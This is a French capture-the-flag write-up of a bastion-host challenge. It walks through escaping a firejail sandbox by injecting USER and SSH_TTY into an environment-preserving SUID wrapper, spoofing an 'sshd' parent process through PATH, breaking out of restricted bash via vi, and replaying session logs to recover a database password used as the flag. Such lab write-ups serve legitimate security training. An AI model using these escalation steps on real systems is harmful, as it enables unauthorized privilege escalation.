# WRITEUP MISC / BASTION
## Consigne :
```
Vous êtes un salarié nouvellement embauché dans une entreprise de soutien informatique. 
Au bout de 2 jours seulement, vous devez gérer votre premier ticket de dérangement.
Comble de "pas de chance", votre tuteur s'est absenté et on vous met la pression pour résoudre cet incident.

Pour traiter ce premier ticket, il est nécessaire de se connecter au réseau de l'entreprise cliente, en SSH via un "bastion d'administration", qui enregistre toutes les activités (saisie au clavier et affichage sur la console).

Démarrer un environnement virtuel, et connectez vous en tant qu'utilisateur 'simpleuser' (mot de passe : 12345678), sur l'adresse IP qui vous a été attribuée (ssh simpleuser@172.102.100.X). Vous êtes dans un environnement contraint, sortez de cette "prison" en retrouvant le mot de passe d'accès à la base de données de l'entreprise.

<div>
<button class="btn btn-info" onclick="window.open('/portailvms/5','_blank')" >Accéder au portail</button>
</div>

> Format du flag : fl@g{.....................}
```

## Pièce jointe :

```
Néant
```

## Serveur :

```
PortailVMS
```

## Points attribués :

```
45
```

## Hint : 

```
Néant
```

## Flag :

```
fl@g{PleaseReadCleanCodeHandBook}
```

## Solution : 
On démarre une instance de *bastion* sur le serveur. Une adresse IP nous est attribuée. Au bout de quelques secondes, l'environnement est accessible en SSH (dans mon cas 172.24.70.173).

```bash
ssh simpleuser@172.24.70.173
```

On visualise les processus :
```bash
simpleuser@bastion:~$ ps -edf
UID          PID    PPID  C STIME TTY          TIME CMD
simpleu+       1       0  0 09:43 ?        00:00:00 /usr/bin/firejail --profile=/opt/bastion/profiles/bastion.profile /bin/bash
simpleu+      37       1  0 09:43 ?        00:00:00 /bin/sh -c '/bin/bash' 
simpleu+      38      37  0 09:43 ?        00:00:00 /bin/bash
simpleu+      40      38  0 09:43 ?        00:00:00 ps -edf
simpleuser@bastion:~$ id
uid=1001(simpleuser) gid=1001(simpleuser) groupes=1001(simpleuser),997(bmembers)
```

Nous sommes bien dans un environnement contraint (utilisation de *firejail*). Dans le dossier `/opt/bastion/` :
```bash
simpleuser@bastion:~$ find /opt/bastion -ls
      854      4 drwxr-xr-x   5 root     root         4096 févr.  1 15:31 /opt/bastion
      863      4 -rwxr-xr-x   1 root     root         3328 févr.  1 15:31 /opt/bastion/shell.sh
      855      4 -rwxr-xr-x   1 root     root          608 janv. 31 15:46 /opt/bastion/common.sh
      871      4 drwxr-xr-x   2 root     root         4096 févr.  1 13:24 /opt/bastion/profiles
      946      4 -rw-r--r--   1 root     root          696 févr.  1 13:24 /opt/bastion/profiles/bastion.profile
      875      4 drwxr-x---   4 root     bmembers     4096 févr.  1 15:49 /opt/bastion/log
      885      4 drwxr-x---   2 root     superuser     4096 févr.  1 15:32 /opt/bastion/log/superuser
find: ‘/opt/bastion/log/superuser’: Permission non accordée
      838      4 drwxr-x---   2 root     simpleuser     4096 févr.  1 15:49 /opt/bastion/log/simpleuser
      847      0 -rw-r-----   1 root     simpleuser        0 févr.  1 15:49 /opt/bastion/log/simpleuser/1643726991-timing.txt
      839      0 -rw-------   1 root     simpleuser        0 févr.  1 15:49 /opt/bastion/log/simpleuser/sha256sum.txt
      840      4 -rw-------   1 root     simpleuser       78 févr.  1 15:49 /opt/bastion/log/simpleuser/traces.log
      841      0 -rw-r-----   1 root     simpleuser        0 févr.  1 15:49 /opt/bastion/log/simpleuser/1643726991-type.txt
      868      4 -rwxr-xr-x   1 root     root           2243 janv. 31 15:46 /opt/bastion/replay.sh
      870      4 drwxr-xr-x   2 root     root           4096 févr.  1 12:17 /opt/bastion/src
      872      4 -rw-r--r--   1 root     root            414 janv. 31 15:46 /opt/bastion/src/wrapper_bastion.c
      874     20 -r-sr-x---   1 root     bmembers      17024 janv. 31 15:46 /opt/bastion/wrapper_bastion
```

Plusieurs choses intéressantes :
 - un dossier de traces (*/opt/bastion/log/superuser*) concernant un autre utilisateur, auquel je n'ai pas accès
 - un programme suid : /opt/bastion/wrapper_bastion, pouvant être lancé par les membres du groupe `bmembers` (dont je fais partie)
 - on a accès au code source de ce programme : `/opt/bastion/src/wrapper_bastion.c`
 - 3 scripts shell, dont un script `replay.sh` (à voir pour plus tard)

si je regarde la configuration du serveur ssh :
```bash
simpleuser@bastion:~$ cat /etc/ssh//sshd_config | grep -vE "^(#.*|\s*)$"
Include /etc/ssh/sshd_config.d/*.conf
PermitRootLogin prohibit-password
MaxAuthTries 6
MaxSessions 10
ChallengeResponseAuthentication no
UsePAM yes
AllowAgentForwarding no
AllowTcpForwarding no
X11Forwarding no
PrintMotd no
AcceptEnv LANG LC_*
Subsystem	sftp	/usr/lib/openssh/sftp-server
AllowGroups bmembers
Match User superuser Address 127.0.0.0/8
    AllowGroups sudo
Match Address *,!127.0.0.0/8
    ForceCommand /usr/local/bin/jail
    AllowGroups bmembers

```

Les membres du groupe `bmembers` et `sudo` peuvent se connecter en ssh. La commande `/usr/local/bin/jail` est exécutée, lorsqu'on se connecte en tant que `bmembers`.
```bash
simpleuser@bastion:~$ ll /usr/local/bin/jail
lrwxrwxrwx 1 root root 28 févr.  1 10:50 /usr/local/bin/jail -> /opt/bastion/wrapper_bastion*
```

`jail` est un lien symbolique vers `/opt/bastion/wrapper_bastion`.

On visualise le code source du *wrapper* :
```bash
simpleuser@bastion:~$ cat /opt/bastion/src/wrapper_bastion.c
cat /opt/bastion/src/wrapper_bastion.c
#include <unistd.h>
#include <errno.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

extern char **environ;
extern int errno;

/* 
gcc -o wrapper_bastion wrapper_bastion.c
*/
int main (int argc, char **argv) {
  uid_t uid, euid;
  uid=getuid();
  euid=geteuid();
  setreuid (euid, euid);
  char *args[] = { "/opt/bastion/shell.sh", NULL };
  execve(args[0], &args[0], environ);
  return errno;
}
```

Ce programme permet juste d’exécuter le script `/opt/bastion/shell.sh`, en tant que *root* (SUID). On remarque que les variables d'environnements sont préservées. 

Analyse du programme `/opt/bastion/shell.sh`. On constate qu'il est possible de modifier le comportement du programme en modifiant la variable d'environnement `$USER` (et potentiellement se connecter sous un autre compte ...):
```bash
...
22  username="${USER}"
...
119 if [[ "$($C_CAT /proc/1/comm)" != "firejail" ]]; then
120    $C_SCRIPT -q --force --timing="${timing}" "${target}" -c "$C_SUDO -u ${username} ${jail}"
121  else
122    # already in sandbox, start a restricted shell
123    $C_SUDO -u ${username} ${jail_fallback}
```

la variable `${jail}`, contient : `jail="/usr/bin/firejail --profile=${firejail_profile} /bin/bash"`, ce qui correspond bien à notre processus ayant le PID=1.


On modifie le contenu de cette variable d'environnement :
```bash
USER=superuser
```

et on tente de devenir 'superuser' :
```bash
simpleuser@bastion:~$ /opt/bastion/wrapper_bastion
/opt/bastion/shell.sh: ligne 96: SSH_TTY : variable sans liaison
```

Nous avons un message d'erreur.

On créé la variable, et on retente :
```bash
simpleuser@bastion:~$ export SSH_TTY="ssh"
simpleuser@bastion:~$ /opt/bastion/wrapper_bastion

Error : Only use over SSH
```

Ce message d'erreur est affiché par ce bout de code :
```bash
96  if [ -z "$SSH_TTY" ] || [ "$($C_PS -o comm= -p $($C_PS -o ppid= -p $PPID))" != "sshd" ] ; then
97      errorAndQuit "Only use over SSH"
98  fi
```

Le deuxième test, vérifie que le nom du processus grand-parent, se nomme **sshd**.
Pour contourner ce test, je vais lancer un processus **sshd**, qui sera en fait un simple shell :
```bash
simpleuser@bastion:~$ mkdir -p /tmp/bin/
simpleuser@bastion:~$ cp /bin/sh /tmp/bin/sshd
simpleuser@bastion:~$ chmod +x /tmp/bin/*
simpleuser@bastion:~$ export PATH=/tmp/bin/:$PATH
simpleuser@bastion:~$ sshd
$ bash
```

On retente :
```bash
simpleuser@bastion:~$ /opt/bastion/wrapper_bastion
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

superuser@bastion:/home/simpleuser$ id
uid=1000(superuser) gid=1000(superuser) groupes=1000(superuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare),997(bmembers)
superuser@bastion:/home/simpleuser$ 
```

J'ai réussi à devenir `superuser`, mais je suis limité en fonctionnalité (pas de suid, bash restreint ...) :
```bash
superuser@bastion:/home/simpleuser$ sudo -l
sudo: le uid effectif n'est pas 0. Est-ce que /usr/local/sbin/sudo est sur un système de fichiers avec l'option «nosuid» ou un système de fichiers NFS sans privilèges root ?
superuser@bastion:/home/simpleuser$ cd /
bash: cd: restreint
superuser@bastion:/home/simpleuser$ ps $$
    PID TTY      STAT   TIME COMMAND
    166 ?        S      0:00 /bin/bash -r
```

Pour en sortir, je passe par vi et je lance un `bash` :
```bash
superuser@bastion:/home/simpleuser$ vi
:!/bin/bash
```

Maintenant on a un shell complet.

on a vu que *bastion* fournissait une commande *replay.sh* :
```bash
superuser@bastion:/home/simpleuser$ /opt/bastion/replay.sh -h
Usage: replay.sh [USERNAME] [TIMESTAMP]
play back typescripts, using timing information

Options:
  -l : list the record timestamps
  -a <num> : speed up execution with time multiplier
  -c <num> : replay N records from this timestamp
  -h : display this help and exit
  -v : output version information and exit

Examples:
  replay.sh -l user1
  replay.sh user1 1643477601
  replay.sh -a 5 -c 25 user1
```


si on regarde les traces enregistrées de l'utilisateur *superuser* :
```bash
superuser@bastion:/home/simpleuser$ /opt/bastion/replay.sh -l superuser
1643900979 (jeu. 03 févr. 2022 16:09:39 CET)
1643901027 (jeu. 03 févr. 2022 16:10:27 CET)
1643901202 (jeu. 03 févr. 2022 16:13:22 CET)
1643903045 (jeu. 03 févr. 2022 16:44:05 CET)
1643903254 (jeu. 03 févr. 2022 16:47:34 CET)
1643903380 (jeu. 03 févr. 2022 16:49:40 CET)
1643903358 (jeu. 03 févr. 2022 16:49:18 CET)
1643903492 (jeu. 03 févr. 2022 16:51:32 CET)
1643903472 (jeu. 03 févr. 2022 16:51:12 CET)
1643904634 (jeu. 03 févr. 2022 17:10:34 CET)
1643907882 (jeu. 03 févr. 2022 18:04:42 CET)
1644228738 (lun. 07 févr. 2022 11:12:18 CET)
```

On recherche le mot de passe pour se connecter à la base de données :
```bash
superuser@bastion:/home/simpleuser$ grep -o "mysql" /opt/bastion/log/superuser/*
/opt/bastion/log/superuser/1643901202-type.txt:mysql
/opt/bastion/log/superuser/1643901202-type.txt:mysql
...
```

Nous allons rejouer, l'enregistrement de la session du jeu. 03 févr. 2022 16:13:22 (timestamp=1643901202) :
```bash
superuser@bastion:/home/simpleuser$ /opt/bastion/replay.sh -a 3 -c 1 superuser 1643901202
──────────────────────────────────────────────────────────────────────────────────────────
[*] START REPLAY - USER : superuser - TIME : 1643901202 (jeu. 03 févr. 2022 16:13:22 CET) 
──────────────────────────────────────────────────────────────────────────────────────────
superuser@bastion:~$ lastlog 
Utilisateur      Port     Venant de        Dernière
root             pts/0    172.24.8.1       mar. févr.  1 14:01:32 +0100 2022
daemon                                     **Jamais connecté**
bin                                        **Jamais connecté**
sys                                        **Jamais connecté**
sync                                       **Jamais connecté**
...
root@portailvms:~# mariadb -u root -pPleaseReadCleanCodeHandBook
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 44
Server version: 10.1.48-MariaDB-0ubuntu0.18.04.1 Ubuntu 18.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>
```

Au bout de quelques secondes, s'affiche la saisie du mot de passe d'accès à la base de données. Il suffit maintenant de valider le *flag* : `fl@g{PleaseReadCleanCodeHandBook}`

<!-- Review Taz : 20230321 -->